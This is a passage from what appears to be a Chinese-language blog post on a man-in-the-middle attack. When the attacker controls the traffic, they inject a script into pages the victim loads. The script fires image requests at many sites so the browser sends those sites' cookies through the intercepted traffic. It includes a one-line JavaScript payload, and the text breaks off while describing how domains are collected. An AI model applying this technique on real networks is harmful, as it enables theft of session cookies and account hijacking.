0x00 前言 分享个中间人攻击姿势,屡试不爽. 原本是篇老文,不过写的太啰嗦.今天用简明的文字,重新讲一遍. 0x01 原理 传统 cookie 嗅探,只能获得用户主动访问的站点.不访问就抓不到,效率很低. 如果流量可控,不如在用户访问的页面中注入一个脚本.通过脚本,就可以请求任意站点: new Image().src = 'http://anyhost' 因为请求头部会带上 cookie,所以能把任意站点的 cookie 骗上流量,让中间人拿到. 0x02 爆发 首先收集各大网站域名,然后挨